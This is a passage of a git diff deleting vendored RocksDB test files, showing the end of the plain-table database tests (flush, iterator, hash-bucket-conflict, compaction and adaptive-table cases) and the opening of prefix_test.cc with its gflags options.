-            plain_table_options.full_scan_mode = false;
-            plain_table_options.store_index_in_file = store_index_in_file;
-
-            options.table_factory.reset(
-                NewPlainTableFactory(plain_table_options));
-          }
-          DestroyAndReopen(&options);
-          uint64_t int_num;
-          ASSERT_TRUE(dbfull()->GetIntProperty(
-              "rocksdb.estimate-table-readers-mem", &int_num));
-          ASSERT_EQ(int_num, 0U);
-
-          ASSERT_OK(Put("1000000000000foo", "v1"));
-          ASSERT_OK(Put("0000000000000bar", "v2"));
-          ASSERT_OK(Put("1000000000000foo", "v3"));
-          dbfull()->TEST_FlushMemTable();
-
-          ASSERT_TRUE(dbfull()->GetIntProperty(
-              "rocksdb.estimate-table-readers-mem", &int_num));
-          ASSERT_GT(int_num, 0U);
-
-          TablePropertiesCollection ptc;
-          reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-          ASSERT_EQ(1U, ptc.size());
-          auto row = ptc.begin();
-          auto tp = row->second;
-
-          if (!store_index_in_file) {
-            ASSERT_EQ(total_order ? "4" : "12",
-                      (tp->user_collected_properties)
-                          .at("plain_table_hash_table_size"));
-            ASSERT_EQ("0", (tp->user_collected_properties)
-                               .at("plain_table_sub_index_size"));
-          } else {
-            ASSERT_EQ("0", (tp->user_collected_properties)
-                               .at("plain_table_hash_table_size"));
-            ASSERT_EQ("0", (tp->user_collected_properties)
-                               .at("plain_table_sub_index_size"));
-          }
-          ASSERT_EQ("v3", Get("1000000000000foo"));
-          ASSERT_EQ("v2", Get("0000000000000bar"));
-        }
-        }
-      }
-    }
-  }
-}
-
-TEST_P(PlainTableDBTest, Flush2) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (EncodingType encoding_type : {kPlain, kPrefix}) {
-    for (int bloom_bits = 0; bloom_bits <= 117; bloom_bits += 117) {
-      for (int total_order = 0; total_order <= 1; total_order++) {
-        for (int store_index_in_file = 0; store_index_in_file <= 1;
-             ++store_index_in_file) {
-          if (encoding_type == kPrefix && total_order) {
-            continue;
-          }
-          if (!bloom_bits && store_index_in_file) {
-            continue;
-          }
-          if (total_order && store_index_in_file) {
-          continue;
-        }
-        bool expect_bloom_not_match = false;
-        Options options = CurrentOptions();
-        options.create_if_missing = true;
-        // Set only one bucket to force bucket conflict.
-        // Test index interval for the same prefix to be 1, 2 and 4
-        PlainTableOptions plain_table_options;
-        if (total_order) {
-          options.prefix_extractor = nullptr;
-          plain_table_options.hash_table_ratio = 0;
-          plain_table_options.index_sparseness = 2;
-        } else {
-          plain_table_options.hash_table_ratio = 0.75;
-          plain_table_options.index_sparseness = 16;
-        }
-        plain_table_options.user_key_len = kPlainTableVariableLength;
-        plain_table_options.bloom_bits_per_key = bloom_bits;
-        plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-        plain_table_options.encoding_type = encoding_type;
-        plain_table_options.store_index_in_file = store_index_in_file;
-        options.table_factory.reset(new TestPlainTableFactory(
-            &expect_bloom_not_match, plain_table_options,
-            0 /* column_family_id */, kDefaultColumnFamilyName));
-
-        DestroyAndReopen(&options);
-        ASSERT_OK(Put("0000000000000bar", "b"));
-        ASSERT_OK(Put("1000000000000foo", "v1"));
-        dbfull()->TEST_FlushMemTable();
-
-        ASSERT_OK(Put("1000000000000foo", "v2"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("v2", Get("1000000000000foo"));
-
-        ASSERT_OK(Put("0000000000000eee", "v3"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("v3", Get("0000000000000eee"));
-
-        ASSERT_OK(Delete("0000000000000bar"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("NOT_FOUND", Get("0000000000000bar"));
-
-        ASSERT_OK(Put("0000000000000eee", "v5"));
-        ASSERT_OK(Put("9000000000000eee", "v5"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("v5", Get("0000000000000eee"));
-
-        // Test Bloom Filter
-        if (bloom_bits > 0) {
-          // Neither key nor value should exist.
-          expect_bloom_not_match = true;
-          ASSERT_EQ("NOT_FOUND", Get("5_not00000000bar"));
-          // Key doesn't exist any more but prefix exists.
-          if (total_order) {
-            ASSERT_EQ("NOT_FOUND", Get("1000000000000not"));
-            ASSERT_EQ("NOT_FOUND", Get("0000000000000not"));
-          }
-          expect_bloom_not_match = false;
-        }
-      }
-      }
-    }
-    }
-  }
-}
-
-TEST_P(PlainTableDBTest, Iterator) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (EncodingType encoding_type : {kPlain, kPrefix}) {
-    for (int bloom_bits = 0; bloom_bits <= 117; bloom_bits += 117) {
-      for (int total_order = 0; total_order <= 1; total_order++) {
-        if (encoding_type == kPrefix && total_order == 1) {
-          continue;
-        }
-        bool expect_bloom_not_match = false;
-        Options options = CurrentOptions();
-        options.create_if_missing = true;
-        // Set only one bucket to force bucket conflict.
-        // Test index interval for the same prefix to be 1, 2 and 4
-        if (total_order) {
-          options.prefix_extractor = nullptr;
-
-          PlainTableOptions plain_table_options;
-          plain_table_options.user_key_len = 16;
-          plain_table_options.bloom_bits_per_key = bloom_bits;
-          plain_table_options.hash_table_ratio = 0;
-          plain_table_options.index_sparseness = 2;
-          plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-          plain_table_options.encoding_type = encoding_type;
-
-          options.table_factory.reset(new TestPlainTableFactory(
-              &expect_bloom_not_match, plain_table_options,
-              0 /* column_family_id */, kDefaultColumnFamilyName));
-        } else {
-          PlainTableOptions plain_table_options;
-          plain_table_options.user_key_len = 16;
-          plain_table_options.bloom_bits_per_key = bloom_bits;
-          plain_table_options.hash_table_ratio = 0.75;
-          plain_table_options.index_sparseness = 16;
-          plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-          plain_table_options.encoding_type = encoding_type;
-
-          options.table_factory.reset(new TestPlainTableFactory(
-              &expect_bloom_not_match, plain_table_options,
-              0 /* column_family_id */, kDefaultColumnFamilyName));
-        }
-        DestroyAndReopen(&options);
-
-        ASSERT_OK(Put("1000000000foo002", "v_2"));
-        ASSERT_OK(Put("0000000000000bar", "random"));
-        ASSERT_OK(Put("1000000000foo001", "v1"));
-        ASSERT_OK(Put("3000000000000bar", "bar_v"));
-        ASSERT_OK(Put("1000000000foo003", "v__3"));
-        ASSERT_OK(Put("1000000000foo004", "v__4"));
-        ASSERT_OK(Put("1000000000foo005", "v__5"));
-        ASSERT_OK(Put("1000000000foo007", "v__7"));
-        ASSERT_OK(Put("1000000000foo008", "v__8"));
-        dbfull()->TEST_FlushMemTable();
-        ASSERT_EQ("v1", Get("1000000000foo001"));
-        ASSERT_EQ("v__3", Get("1000000000foo003"));
-        Iterator* iter = dbfull()->NewIterator(ReadOptions());
-        iter->Seek("1000000000foo000");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo001", iter->key().ToString());
-        ASSERT_EQ("v1", iter->value().ToString());
-
-        iter->Next();
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo002", iter->key().ToString());
-        ASSERT_EQ("v_2", iter->value().ToString());
-
-        iter->Next();
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo003", iter->key().ToString());
-        ASSERT_EQ("v__3", iter->value().ToString());
-
-        iter->Next();
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo004", iter->key().ToString());
-        ASSERT_EQ("v__4", iter->value().ToString());
-
-        iter->Seek("3000000000000bar");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("3000000000000bar", iter->key().ToString());
-        ASSERT_EQ("bar_v", iter->value().ToString());
-
-        iter->Seek("1000000000foo000");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo001", iter->key().ToString());
-        ASSERT_EQ("v1", iter->value().ToString());
-
-        iter->Seek("1000000000foo005");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo005", iter->key().ToString());
-        ASSERT_EQ("v__5", iter->value().ToString());
-
-        iter->Seek("1000000000foo006");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo007", iter->key().ToString());
-        ASSERT_EQ("v__7", iter->value().ToString());
-
-        iter->Seek("1000000000foo008");
-        ASSERT_TRUE(iter->Valid());
-        ASSERT_EQ("1000000000foo008", iter->key().ToString());
-        ASSERT_EQ("v__8", iter->value().ToString());
-
-        if (total_order == 0) {
-          iter->Seek("1000000000foo009");
-          ASSERT_TRUE(iter->Valid());
-          ASSERT_EQ("3000000000000bar", iter->key().ToString());
-        }
-
-        // Test Bloom Filter
-        if (bloom_bits > 0) {
-          if (!total_order) {
-            // Neither key nor value should exist.
-            expect_bloom_not_match = true;
-            iter->Seek("2not000000000bar");
-            ASSERT_TRUE(!iter->Valid());
-            ASSERT_EQ("NOT_FOUND", Get("2not000000000bar"));
-            expect_bloom_not_match = false;
-          } else {
-            expect_bloom_not_match = true;
-            ASSERT_EQ("NOT_FOUND", Get("2not000000000bar"));
-            expect_bloom_not_match = false;
-          }
-        }
-
-        delete iter;
-      }
-    }
-    }
-  }
-}
-
-namespace {
-std::string MakeLongKey(size_t length, char c) {
-  return std::string(length, c);
-}
-}  // namespace
-
-TEST_P(PlainTableDBTest, IteratorLargeKeys) {
-  Options options = CurrentOptions();
-
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 0;
-  plain_table_options.bloom_bits_per_key = 0;
-  plain_table_options.hash_table_ratio = 0;
-
-  options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-  options.create_if_missing = true;
-  options.prefix_extractor.reset();
-  DestroyAndReopen(&options);
-
-  std::string key_list[] = {
-      MakeLongKey(30, '0'),
-      MakeLongKey(16, '1'),
-      MakeLongKey(32, '2'),
-      MakeLongKey(60, '3'),
-      MakeLongKey(90, '4'),
-      MakeLongKey(50, '5'),
-      MakeLongKey(26, '6')
-  };
-
-  for (size_t i = 0; i < 7; i++) {
-    ASSERT_OK(Put(key_list[i], ToString(i)));
-  }
-
-  dbfull()->TEST_FlushMemTable();
-
-  Iterator* iter = dbfull()->NewIterator(ReadOptions());
-  iter->Seek(key_list[0]);
-
-  for (size_t i = 0; i < 7; i++) {
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(key_list[i], iter->key().ToString());
-    ASSERT_EQ(ToString(i), iter->value().ToString());
-    iter->Next();
-  }
-
-  ASSERT_TRUE(!iter->Valid());
-
-  delete iter;
-}
-
-namespace {
-std::string MakeLongKeyWithPrefix(size_t length, char c) {
-  return "00000000" + std::string(length - 8, c);
-}
-}  // namespace
-
-TEST_P(PlainTableDBTest, IteratorLargeKeysWithPrefix) {
-  Options options = CurrentOptions();
-
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 16;
-  plain_table_options.bloom_bits_per_key = 0;
-  plain_table_options.hash_table_ratio = 0.8;
-  plain_table_options.index_sparseness = 3;
-  plain_table_options.huge_page_tlb_size = 0;
-  plain_table_options.encoding_type = kPrefix;
-
-  options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-  options.create_if_missing = true;
-  DestroyAndReopen(&options);
-
-  std::string key_list[] = {
-      MakeLongKeyWithPrefix(30, '0'), MakeLongKeyWithPrefix(16, '1'),
-      MakeLongKeyWithPrefix(32, '2'), MakeLongKeyWithPrefix(60, '3'),
-      MakeLongKeyWithPrefix(90, '4'), MakeLongKeyWithPrefix(50, '5'),
-      MakeLongKeyWithPrefix(26, '6')};
-
-  for (size_t i = 0; i < 7; i++) {
-    ASSERT_OK(Put(key_list[i], ToString(i)));
-  }
-
-  dbfull()->TEST_FlushMemTable();
-
-  Iterator* iter = dbfull()->NewIterator(ReadOptions());
-  iter->Seek(key_list[0]);
-
-  for (size_t i = 0; i < 7; i++) {
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(key_list[i], iter->key().ToString());
-    ASSERT_EQ(ToString(i), iter->value().ToString());
-    iter->Next();
-  }
-
-  ASSERT_TRUE(!iter->Valid());
-
-  delete iter;
-}
-
-TEST_P(PlainTableDBTest, IteratorReverseSuffixComparator) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  // Set only one bucket to force bucket conflict.
-  // Test index interval for the same prefix to be 1, 2 and 4
-  test::SimpleSuffixReverseComparator comp;
-  options.comparator = &comp;
-  DestroyAndReopen(&options);
-
-  ASSERT_OK(Put("1000000000foo002", "v_2"));
-  ASSERT_OK(Put("0000000000000bar", "random"));
-  ASSERT_OK(Put("1000000000foo001", "v1"));
-  ASSERT_OK(Put("3000000000000bar", "bar_v"));
-  ASSERT_OK(Put("1000000000foo003", "v__3"));
-  ASSERT_OK(Put("1000000000foo004", "v__4"));
-  ASSERT_OK(Put("1000000000foo005", "v__5"));
-  ASSERT_OK(Put("1000000000foo007", "v__7"));
-  ASSERT_OK(Put("1000000000foo008", "v__8"));
-  dbfull()->TEST_FlushMemTable();
-  ASSERT_EQ("v1", Get("1000000000foo001"));
-  ASSERT_EQ("v__3", Get("1000000000foo003"));
-  Iterator* iter = dbfull()->NewIterator(ReadOptions());
-  iter->Seek("1000000000foo009");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo008", iter->key().ToString());
-  ASSERT_EQ("v__8", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo007", iter->key().ToString());
-  ASSERT_EQ("v__7", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo005", iter->key().ToString());
-  ASSERT_EQ("v__5", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo004", iter->key().ToString());
-  ASSERT_EQ("v__4", iter->value().ToString());
-
-  iter->Seek("3000000000000bar");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("3000000000000bar", iter->key().ToString());
-  ASSERT_EQ("bar_v", iter->value().ToString());
-
-  iter->Seek("1000000000foo005");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo005", iter->key().ToString());
-  ASSERT_EQ("v__5", iter->value().ToString());
-
-  iter->Seek("1000000000foo006");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo005", iter->key().ToString());
-  ASSERT_EQ("v__5", iter->value().ToString());
-
-  iter->Seek("1000000000foo008");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("1000000000foo008", iter->key().ToString());
-  ASSERT_EQ("v__8", iter->value().ToString());
-
-  iter->Seek("1000000000foo000");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("3000000000000bar", iter->key().ToString());
-
-  delete iter;
-}
-
-TEST_P(PlainTableDBTest, HashBucketConflict) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (unsigned char i = 1; i <= 3; i++) {
-      Options options = CurrentOptions();
-      options.create_if_missing = true;
-      // Set only one bucket to force bucket conflict.
-      // Test index interval for the same prefix to be 1, 2 and 4
-
-      PlainTableOptions plain_table_options;
-      plain_table_options.user_key_len = 16;
-      plain_table_options.bloom_bits_per_key = 0;
-      plain_table_options.hash_table_ratio = 0;
-      plain_table_options.index_sparseness = 2 ^ i;
-      plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-
-      options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-
-      DestroyAndReopen(&options);
-      ASSERT_OK(Put("5000000000000fo0", "v1"));
-      ASSERT_OK(Put("5000000000000fo1", "v2"));
-      ASSERT_OK(Put("5000000000000fo2", "v"));
-      ASSERT_OK(Put("2000000000000fo0", "v3"));
-      ASSERT_OK(Put("2000000000000fo1", "v4"));
-      ASSERT_OK(Put("2000000000000fo2", "v"));
-      ASSERT_OK(Put("2000000000000fo3", "v"));
-
-      dbfull()->TEST_FlushMemTable();
-
-      ASSERT_EQ("v1", Get("5000000000000fo0"));
-      ASSERT_EQ("v2", Get("5000000000000fo1"));
-      ASSERT_EQ("v3", Get("2000000000000fo0"));
-      ASSERT_EQ("v4", Get("2000000000000fo1"));
-
-      ASSERT_EQ("NOT_FOUND", Get("5000000000000bar"));
-      ASSERT_EQ("NOT_FOUND", Get("2000000000000bar"));
-      ASSERT_EQ("NOT_FOUND", Get("5000000000000fo8"));
-      ASSERT_EQ("NOT_FOUND", Get("2000000000000fo8"));
-
-      ReadOptions ro;
-      Iterator* iter = dbfull()->NewIterator(ro);
-
-      iter->Seek("5000000000000fo0");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo0", iter->key().ToString());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo1", iter->key().ToString());
-
-      iter->Seek("5000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000fo0");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo0", iter->key().ToString());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000bar");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo0", iter->key().ToString());
-
-      iter->Seek("5000000000000bar");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo0", iter->key().ToString());
-
-      iter->Seek("2000000000000fo8");
-      ASSERT_TRUE(!iter->Valid() ||
-                  options.comparator->Compare(iter->key(), "20000001") > 0);
-
-      iter->Seek("5000000000000fo8");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("1000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("3000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("8000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      delete iter;
-    }
-  }
-}
-
-TEST_P(PlainTableDBTest, HashBucketConflictReverseSuffixComparator) {
-  for (size_t huge_page_tlb_size = 0; huge_page_tlb_size <= 2 * 1024 * 1024;
-       huge_page_tlb_size += 2 * 1024 * 1024) {
-    for (unsigned char i = 1; i <= 3; i++) {
-      Options options = CurrentOptions();
-      options.create_if_missing = true;
-      test::SimpleSuffixReverseComparator comp;
-      options.comparator = &comp;
-      // Set only one bucket to force bucket conflict.
-      // Test index interval for the same prefix to be 1, 2 and 4
-
-      PlainTableOptions plain_table_options;
-      plain_table_options.user_key_len = 16;
-      plain_table_options.bloom_bits_per_key = 0;
-      plain_table_options.hash_table_ratio = 0;
-      plain_table_options.index_sparseness = 2 ^ i;
-      plain_table_options.huge_page_tlb_size = huge_page_tlb_size;
-
-      options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-      DestroyAndReopen(&options);
-      ASSERT_OK(Put("5000000000000fo0", "v1"));
-      ASSERT_OK(Put("5000000000000fo1", "v2"));
-      ASSERT_OK(Put("5000000000000fo2", "v"));
-      ASSERT_OK(Put("2000000000000fo0", "v3"));
-      ASSERT_OK(Put("2000000000000fo1", "v4"));
-      ASSERT_OK(Put("2000000000000fo2", "v"));
-      ASSERT_OK(Put("2000000000000fo3", "v"));
-
-      dbfull()->TEST_FlushMemTable();
-
-      ASSERT_EQ("v1", Get("5000000000000fo0"));
-      ASSERT_EQ("v2", Get("5000000000000fo1"));
-      ASSERT_EQ("v3", Get("2000000000000fo0"));
-      ASSERT_EQ("v4", Get("2000000000000fo1"));
-
-      ASSERT_EQ("NOT_FOUND", Get("5000000000000bar"));
-      ASSERT_EQ("NOT_FOUND", Get("2000000000000bar"));
-      ASSERT_EQ("NOT_FOUND", Get("5000000000000fo8"));
-      ASSERT_EQ("NOT_FOUND", Get("2000000000000fo8"));
-
-      ReadOptions ro;
-      Iterator* iter = dbfull()->NewIterator(ro);
-
-      iter->Seek("5000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo1", iter->key().ToString());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo0", iter->key().ToString());
-
-      iter->Seek("5000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo1", iter->key().ToString());
-      iter->Next();
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo0", iter->key().ToString());
-
-      iter->Seek("2000000000000fo1");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo1", iter->key().ToString());
-
-      iter->Seek("2000000000000var");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("2000000000000fo3", iter->key().ToString());
-
-      iter->Seek("5000000000000var");
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ("5000000000000fo2", iter->key().ToString());
-
-      std::string seek_key = "2000000000000bar";
-      iter->Seek(seek_key);
-      ASSERT_TRUE(!iter->Valid() ||
-                  options.prefix_extractor->Transform(iter->key()) !=
-                      options.prefix_extractor->Transform(seek_key));
-
-      iter->Seek("1000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("3000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      iter->Seek("8000000000000fo2");
-      ASSERT_TRUE(!iter->Valid());
-
-      delete iter;
-    }
-  }
-}
-
-TEST_P(PlainTableDBTest, NonExistingKeyToNonEmptyBucket) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  // Set only one bucket to force bucket conflict.
-  // Test index interval for the same prefix to be 1, 2 and 4
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 16;
-  plain_table_options.bloom_bits_per_key = 0;
-  plain_table_options.hash_table_ratio = 0;
-  plain_table_options.index_sparseness = 5;
-
-  options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-  DestroyAndReopen(&options);
-  ASSERT_OK(Put("5000000000000fo0", "v1"));
-  ASSERT_OK(Put("5000000000000fo1", "v2"));
-  ASSERT_OK(Put("5000000000000fo2", "v3"));
-
-  dbfull()->TEST_FlushMemTable();
-
-  ASSERT_EQ("v1", Get("5000000000000fo0"));
-  ASSERT_EQ("v2", Get("5000000000000fo1"));
-  ASSERT_EQ("v3", Get("5000000000000fo2"));
-
-  ASSERT_EQ("NOT_FOUND", Get("8000000000000bar"));
-  ASSERT_EQ("NOT_FOUND", Get("1000000000000bar"));
-
-  Iterator* iter = dbfull()->NewIterator(ReadOptions());
-
-  iter->Seek("5000000000000bar");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("5000000000000fo0", iter->key().ToString());
-
-  iter->Seek("5000000000000fo8");
-  ASSERT_TRUE(!iter->Valid());
-
-  iter->Seek("1000000000000fo2");
-  ASSERT_TRUE(!iter->Valid());
-
-  iter->Seek("8000000000000fo2");
-  ASSERT_TRUE(!iter->Valid());
-
-  delete iter;
-}
-
-static std::string Key(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "key_______%06d", i);
-  return std::string(buf);
-}
-
-static std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-
-TEST_P(PlainTableDBTest, CompactionTrigger) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 120 << 10;  // 100KB
-  options.num_levels = 3;
-  options.level0_file_num_compaction_trigger = 3;
-  Reopen(&options);
-
-  Random rnd(301);
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-      num++) {
-    std::vector<std::string> values;
-    // Write 120KB (10 values, each 12K)
-    for (int i = 0; i < 10; i++) {
-      values.push_back(RandomString(&rnd, 12000));
-      ASSERT_OK(Put(Key(i), values[i]));
-    }
-    ASSERT_OK(Put(Key(999), ""));
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(NumTableFilesAtLevel(0), num + 1);
-  }
-
-  //generate one more file in level-0, and should trigger level-0 compaction
-  std::vector<std::string> values;
-  for (int i = 0; i < 12; i++) {
-    values.push_back(RandomString(&rnd, 10000));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Put(Key(999), ""));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1), 1);
-}
-
-TEST_P(PlainTableDBTest, AdaptiveTable) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-
-  options.table_factory.reset(NewPlainTableFactory());
-  DestroyAndReopen(&options);
-
-  ASSERT_OK(Put("1000000000000foo", "v1"));
-  ASSERT_OK(Put("0000000000000bar", "v2"));
-  ASSERT_OK(Put("1000000000000foo", "v3"));
-  dbfull()->TEST_FlushMemTable();
-
-  options.create_if_missing = false;
-  std::shared_ptr<TableFactory> dummy_factory;
-  std::shared_ptr<TableFactory> block_based_factory(
-      NewBlockBasedTableFactory());
-  options.table_factory.reset(NewAdaptiveTableFactory(
-      block_based_factory, dummy_factory, dummy_factory));
-  Reopen(&options);
-  ASSERT_EQ("v3", Get("1000000000000foo"));
-  ASSERT_EQ("v2", Get("0000000000000bar"));
-
-  ASSERT_OK(Put("2000000000000foo", "v4"));
-  ASSERT_OK(Put("3000000000000bar", "v5"));
-  dbfull()->TEST_FlushMemTable();
-  ASSERT_EQ("v4", Get("2000000000000foo"));
-  ASSERT_EQ("v5", Get("3000000000000bar"));
-
-  Reopen(&options);
-  ASSERT_EQ("v3", Get("1000000000000foo"));
-  ASSERT_EQ("v2", Get("0000000000000bar"));
-  ASSERT_EQ("v4", Get("2000000000000foo"));
-  ASSERT_EQ("v5", Get("3000000000000bar"));
-
-  options.table_factory.reset(NewBlockBasedTableFactory());
-  Reopen(&options);
-  ASSERT_NE("v3", Get("1000000000000foo"));
-
-  options.table_factory.reset(NewPlainTableFactory());
-  Reopen(&options);
-  ASSERT_NE("v5", Get("3000000000000bar"));
-}
-
-INSTANTIATE_TEST_CASE_P(PlainTableDBTest, PlainTableDBTest, ::testing::Bool());
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as plain table is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/prefix_test.cc b/thirdparty/rocksdb/db/prefix_test.cc
deleted file mode 100644
index a4ed201..0000000
--- a/thirdparty/rocksdb/db/prefix_test.cc
+++ /dev/null
@@ -1,899 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run this test... Skipping...\n");
-  return 0;
-}
-#else
-
-#include <algorithm>
-#include <iostream>
-#include <vector>
-
-#include <gflags/gflags.h>
-#include "db/db_impl.h"
-#include "monitoring/histogram.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "util/random.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "utilities/merge_operators.h"
-#include "util/coding.h"
-
-using GFLAGS::ParseCommandLineFlags;
-
-DEFINE_bool(trigger_deadlock, false,
-            "issue delete in range scan to trigger PrefixHashMap deadlock");
-DEFINE_int32(bucket_count, 100000, "number of buckets");
-DEFINE_uint64(num_locks, 10001, "number of locks");
-DEFINE_bool(random_prefix, false, "randomize prefix");
-DEFINE_uint64(total_prefixes, 100000, "total number of prefixes");
-DEFINE_uint64(items_per_prefix, 1, "total number of values per prefix");
-DEFINE_int64(write_buffer_size, 33554432, "");
-DEFINE_int32(max_write_buffer_number, 2, "");
-DEFINE_int32(min_write_buffer_number_to_merge, 1, "");
-DEFINE_int32(skiplist_height, 4, "");
-DEFINE_double(memtable_prefix_bloom_size_ratio, 0.1, "");
-DEFINE_int32(memtable_huge_page_size, 2 * 1024 * 1024, "");
-DEFINE_int32(value_size, 40, "");
-DEFINE_bool(enable_print, false, "Print options generated to console.");
-
-// Path to the database on file system
-const std::string kDbName = rocksdb::test::TmpDir() + "/prefix_test";
-
-namespace rocksdb {
-
-struct TestKey {
-  uint64_t prefix;
-  uint64_t sorted;
-
-  TestKey(uint64_t _prefix, uint64_t _sorted)
-      : prefix(_prefix), sorted(_sorted) {}
-};
-
-// return a slice backed by test_key
-inline Slice TestKeyToSlice(std::string &s, const TestKey& test_key) {
-  s.clear();
-  PutFixed64(&s, test_key.prefix);
-  PutFixed64(&s, test_key.sorted);
-  return Slice(s.c_str(), s.size());
-}
-
-inline const TestKey SliceToTestKey(const Slice& slice) {
-  return TestKey(DecodeFixed64(slice.data()),
-    DecodeFixed64(slice.data() + 8));
-}
-
